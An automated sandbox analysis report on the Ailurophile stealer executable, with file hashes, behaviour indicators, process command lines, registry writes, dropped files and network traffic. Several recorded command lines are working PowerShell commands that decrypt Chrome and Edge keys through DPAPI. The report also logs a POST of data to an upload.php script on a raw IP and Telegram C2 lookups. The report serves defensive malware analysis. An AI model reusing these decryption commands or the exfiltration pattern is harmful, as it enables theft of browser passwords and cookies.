File name:

Ailurophile_full.exe

Full analysis: https://app.any.run/tasks/7ba954aa-182b-4c23-ae45-7e72443c7846
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: August 07, 2024, 12:20:57
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
stealer
telegram
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (console) Intel 80386, for MS Windows
MD5:

58BD748483B75A3A6470075E2E57D679

SHA1:

726F7BFB18899B67629DC0A7981E6A21FB5DDF38

SHA256:

4D38D7C7161CCB08998F90079A565F32A296F1BF404001B9E6BBC4D4558D53FD

SSDEEP:

98304:HzcT9lX75CN9PFBKDzUN1vzUXCz/GjxJA523mP5udUZ33H2rWGW8cjqqKT98K5EY:c9rEVvRf/w5uBk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • Ailurophile_full.exe (PID: 6420)
    • Changes powershell execution policy (RemoteSigned)

      • cmd.exe (PID: 7112)
      • cmd.exe (PID: 7164)
    • Actions looks like stealing of personal data

      • Ailurophile_full.exe (PID: 6576)
  • SUSPICIOUS

    • Application launched itself

      • Ailurophile_full.exe (PID: 6420)
    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 6656)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 6656)
    • Starts CMD.EXE for commands execution

      • Ailurophile_full.exe (PID: 6576)
    • Probably file/command deobfuscation

      • cmd.exe (PID: 7164)
      • cmd.exe (PID: 7112)
    • Cryptography encrypted command line is found

      • powershell.exe (PID: 6208)
      • cmd.exe (PID: 7164)
      • cmd.exe (PID: 7112)
      • powershell.exe (PID: 6736)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 7112)
      • cmd.exe (PID: 7164)
    • Get information on the list of running processes

      • Ailurophile_full.exe (PID: 6576)
      • cmd.exe (PID: 7280)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7112)
      • cmd.exe (PID: 7164)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • Ailurophile_full.exe (PID: 6576)
    • Checks for external IP

      • Ailurophile_full.exe (PID: 6576)
  • INFO

    • Checks supported languages

      • Ailurophile_full.exe (PID: 6420)
      • Ailurophile_full.exe (PID: 6576)
    • Reads the computer name

      • Ailurophile_full.exe (PID: 6420)
      • Ailurophile_full.exe (PID: 6576)
    • Reads Environment values

      • Ailurophile_full.exe (PID: 6420)
      • Ailurophile_full.exe (PID: 6576)
    • Creates files or folders in the user directory

      • Ailurophile_full.exe (PID: 6576)
    • Attempting to use instant messaging service

      • Ailurophile_full.exe (PID: 6576)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Inno Setup installer (62.7)
.exe | Win32 EXE PECompact compressed (generic) (23.7)
.scr | Windows screen saver (7.4)
.exe | Win32 Executable (generic) (2.5)
.exe | Win16/32 Executable Delphi generic (1.1)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:07:26 07:42:53+00:00
ImageFileCharacteristics: No relocs, Executable, 32-bit
PEType: PE32
LinkerVersion: 2.25
CodeSize: 3982336
InitializedDataSize: 981504
UninitializedDataSize: -
EntryPoint: 0x3cded4
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows command line
FileVersionNumber: 1.0.0.5
ProductVersionNumber: 24.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
CompanyName: Ailurophile
FileDescription: Ailurophile
FileVersion: 1.0.0.5
LegalCopyright: Copyright by Ailurophile, 7/31/2024
OriginalFileName: Ailurophile_full.exe
ProductName: Ailurophile
ProductVersion: 24.0.0.0
Comments: This program was built with ExeOutput for PHP, www.exeoutput.com
Web: http://
LegalTrademarks: Built with ExeOutput for PHP TRIAL, not licensed for distribution. Buy a license at http://www.exeoutput.com
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
146
Monitored processes
16
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start ailurophile_full.exe no specs conhost.exe no specs ailurophile_full.exe cmd.exe no specs systeminfo.exe no specs findstr.exe no specs tiworker.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs tasklist.exe no specs cmd.exe no specs net.exe no specs net1.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
6208powershell.exe -Command "Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process; Add-Type -AssemblyName System.Security; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,7,104,106,19,244,3,72,70,145,69,23,254,229,195,123,51,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,168,107,224,243,105,130,17,51,102,224,140,169,25,63,129,98,209,82,74,216,20,214,48,1,80,87,163,100,64,229,54,249,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,11,193,237,28,124,20,248,68,43,119,128,170,188,163,135,70,173,95,25,54,72,132,203,73,66,254,134,25,129,164,238,48,0,0,0,209,12,254,148,255,228,245,184,135,231,116,216,209,99,55,22,50,218,43,53,171,135,191,123,48,106,132,195,12,39,54,231,71,239,11,215,155,70,31,236,173,237,167,158,33,172,150,130,64,0,0,0,111,170,54,27,62,222,66,183,53,90,197,175,213,50,248,82,39,84,226,43,204,78,118,131,194,34,50,93,146,1,196,126,22,88,91,165,175,223,151,47,9,17,56,1,13,30,3,242,31,213,100,134,95,181,233,109,69,108,99,91,11,54,148,132), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
6420"C:\Users\admin\Downloads\Ailurophile_full.exe" C:\Users\admin\Downloads\Ailurophile_full.exeexplorer.exe
User:
admin
Company:
Ailurophile
Integrity Level:
MEDIUM
Description:
Ailurophile
Exit code:
0
Version:
1.0.0.5
Modules
Images
c:\users\admin\downloads\ailurophile_full.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
6428\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeAilurophile_full.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6576"C:\Users\admin\Downloads\Ailurophile_full.exe" -c "C:\Users\admin\Downloads\Data\php-cli.ini" "C:\Users\admin\Downloads\Data\index.php"C:\Users\admin\Downloads\Ailurophile_full.exe
Ailurophile_full.exe
User:
admin
Company:
Ailurophile
Integrity Level:
MEDIUM
Description:
Ailurophile
Exit code:
0
Version:
1.0.0.5
Modules
Images
c:\users\admin\downloads\ailurophile_full.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
6656cmd.exe /c "systeminfo | findstr /B /C:"OS Name""C:\Windows\SysWOW64\cmd.exeAilurophile_full.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
6692systeminfo C:\Windows\SysWOW64\systeminfo.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Displays system information
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\systeminfo.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
6700findstr /B /C:"OS Name"C:\Windows\SysWOW64\findstr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (QGREP) Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\findstr.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
6736powershell.exe -Command "Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process; Add-Type -AssemblyName System.Security; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,7,104,106,19,244,3,72,70,145,69,23,254,229,195,123,51,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,87,20,236,74,212,205,226,101,121,254,102,120,28,137,168,118,78,88,3,104,185,22,5,6,132,90,150,238,66,209,143,129,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,223,106,58,56,191,228,177,216,88,216,155,3,106,192,83,70,97,52,35,107,123,54,190,35,157,15,42,71,75,25,41,171,48,0,0,0,70,153,52,250,74,116,67,46,26,153,219,198,21,28,198,76,47,28,102,4,200,26,120,136,210,123,14,165,161,24,37,14,245,106,210,91,28,42,132,141,185,249,243,111,211,212,106,221,64,0,0,0,207,181,57,59,149,245,28,152,96,37,48,212,89,11,197,200,217,121,9,239,75,101,128,113,91,3,223,41,114,105,215,137,208,235,152,236,23,106,3,145,203,29,232,128,41,162,104,250,84,252,109,91,87,30,165,224,231,22,239,81,12,21,165,115), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
7000C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe -EmbeddingC:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Modules Installer Worker
Version:
10.0.19041.3989 (WinBuild.160101.0800)
Modules
Images
c:\windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\tiworker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
7112cmd.exe /c "powershell.exe -Command "Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process; Add-Type -AssemblyName System.Security; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,7,104,106,19,244,3,72,70,145,69,23,254,229,195,123,51,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,87,20,236,74,212,205,226,101,121,254,102,120,28,137,168,118,78,88,3,104,185,22,5,6,132,90,150,238,66,209,143,129,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,223,106,58,56,191,228,177,216,88,216,155,3,106,192,83,70,97,52,35,107,123,54,190,35,157,15,42,71,75,25,41,171,48,0,0,0,70,153,52,250,74,116,67,46,26,153,219,198,21,28,198,76,47,28,102,4,200,26,120,136,210,123,14,165,161,24,37,14,245,106,210,91,28,42,132,141,185,249,243,111,211,212,106,221,64,0,0,0,207,181,57,59,149,245,28,152,96,37,48,212,89,11,197,200,217,121,9,239,75,101,128,113,91,3,223,41,114,105,215,137,208,235,152,236,23,106,3,145,203,29,232,128,41,162,104,250,84,252,109,91,87,30,165,224,231,22,239,81,12,21,165,115), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString""C:\Windows\SysWOW64\cmd.exeAilurophile_full.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
Total events
16 840
Read events
16 821
Write events
19
Delete events
0

Modification events

(PID) Process:(6692) systeminfo.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3c\52C64B7E
Operation:writeName:@%SystemRoot%\system32\mlang.dll,-4386
Value:
English (United States)
(PID) Process:(7000) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31123652
(PID) Process:(7000) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
(PID) Process:(6208) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6208) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6208) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6208) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(6736) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6736) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6736) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
Executable files
0
Suspicious files
4
Text files
18
Unknown types
7

Dropped files

PID
Process
Filename
Type
6576Ailurophile_full.exeC:\Users\admin\AppData\Local\Ailurophile\Cookies\Microsoft_Default.txttext
MD5:9644BD49A7A2F0444704AF6092921532
SHA256:520DDDCE3951D29D6E1E6397F30D9570E9BCCB7CA0A1B296F7C6E208EACAB038
7000TiWorker.exeC:\Windows\Logs\CBS\CBS.logtext
MD5:0C2A755062F3D2566015AB8AF26AFC26
SHA256:0A538E0ED50395102441E9937B31EC9578528757C06BA3F27C0563D8430E547B
6576Ailurophile_full.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\history.dbbinary
MD5:FDDE63730E15DD2E18C540BA52B6A945
SHA256:40740EAABD14FC0E08D3B5EE340C1E1B372E158F61EF58AEED1EE4B3A3F4492E
6208powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lfe4hok4.4bb.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6736powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uwuvxmma.tjt.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6736powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_c4eq1efn.qov.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6736powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j4piyg1p.afy.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6208powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:175D4078D39ECE3347306C8E6DA7BB54
SHA256:A2F9AB7B5FEAB98206310B9338F161715CBF681AA6F16A277BD63ECCAF6D0E87
6736powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qjp4aikx.sw2.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6576Ailurophile_full.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\passwords.dbsqlite
MD5:A45465CDCDC6CB30C8906F3DA4EC114C
SHA256:4412319EF944EBCCA9581CBACB1D4E1DC614C348D1DFC5D2FAAAAD863D300209
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
45
DNS requests
19
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6576
Ailurophile_full.exe
GET
200
172.67.74.152:80
http://api.ipify.org/
unknown
whitelisted
5336
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
2248
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
2616
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4484
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
6576
Ailurophile_full.exe
POST
200
103.252.123.135:80
http://103.252.123.135/upload.php
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3888
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
1108
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1116
RUXIMICS.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2120
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
6576
Ailurophile_full.exe
172.67.74.152:80
api.ipify.org
CLOUDFLARENET
US
unknown
1108
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
5336
SearchApp.exe
104.126.37.162:443
www.bing.com
Akamai International B.V.
DE
unknown
3260
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
whitelisted
google.com
  • 142.250.185.206
whitelisted
api.ipify.org
  • 172.67.74.152
  • 104.26.13.205
  • 104.26.12.205
shared
www.bing.com
  • 104.126.37.162
  • 104.126.37.176
  • 104.126.37.160
  • 104.126.37.171
  • 104.126.37.168
  • 104.126.37.170
  • 104.126.37.161
  • 104.126.37.169
  • 104.126.37.163
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.2
  • 20.190.159.4
  • 40.126.31.67
  • 20.190.159.73
  • 20.190.159.75
  • 20.190.159.0
  • 40.126.31.71
  • 20.190.159.23
whitelisted
th.bing.com
  • 104.126.37.176
  • 104.126.37.177
  • 104.126.37.131
  • 104.126.37.186
  • 104.126.37.178
  • 104.126.37.130
  • 104.126.37.171
  • 104.126.37.128
  • 104.126.37.185
whitelisted
fd.api.iris.microsoft.com
  • 20.223.35.26
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted

Threats

PID
Process
Class
Message
6576
Ailurophile_full.exe
Device Retrieving External IP Address Detected
SUSPICIOUS [ANY.RUN] An IP address was received from the server as a result of an HTTP request
6576
Ailurophile_full.exe
Device Retrieving External IP Address Detected
POLICY [ANY.RUN] External IP Lookup by HTTP (api .ipify .org)
6576
Ailurophile_full.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup api.ipify.org
2256
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
2256
svchost.exe
Misc activity
SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
6576
Ailurophile_full.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
2256
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
No debug info